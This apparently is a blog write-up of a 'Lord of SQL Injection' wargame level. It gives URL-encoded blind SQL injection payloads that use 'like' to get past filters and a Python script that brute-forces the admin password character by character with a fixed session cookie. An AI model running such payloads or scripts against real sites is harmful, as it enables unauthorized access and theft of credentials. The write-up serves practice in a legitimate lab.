?pw=1&no=1%20%7C%7C%20id%20like%20%22admin%22%20%26%26length(pw)%20like%208


?pw=1&no=1%20||%20id%20like%20%22admin%22%20%26%26right(left(pw,1),1)%20like%20”a”


import requests


headers = {'User-Agent': 'Mozilla/5.0'}
cookies = {'PHPSESSID':'25g6h0pbijn3arrdalpfkie222'}

'''
?pw=1&no=1%20||%20id%20like%20%22admin%22%20%26%26right(left(pw,1),1)%20like%20a
'''

for x in range(8):
    for c in range(33, 125):
        rs = requests.get(url + '?pw=1&no=1%20||%20id%20like%20%22admin%22%20%26%26right(left(pw,' + str(x+1) + '),1)%20like%20"' + chr(c) +'"' , headers=headers, cookies=cookies)
        text = rs.text

        if("<h2>Hello admin</h2>" in text):

            print(str(x+1) + " " + chr(c) + " find it") 


'0x20 Security > 0x25 Write-Ups' 카테고리의 다른 글

[LOS1] giant  (0) 2018.09.22
[LOS1] bugbear  (0) 2018.09.22
[LOS1] golem  (0) 2018.09.22
[LOS1] skelleton  (0) 2018.09.22
[LOS1] vampire  (0) 2018.09.22

+ Recent posts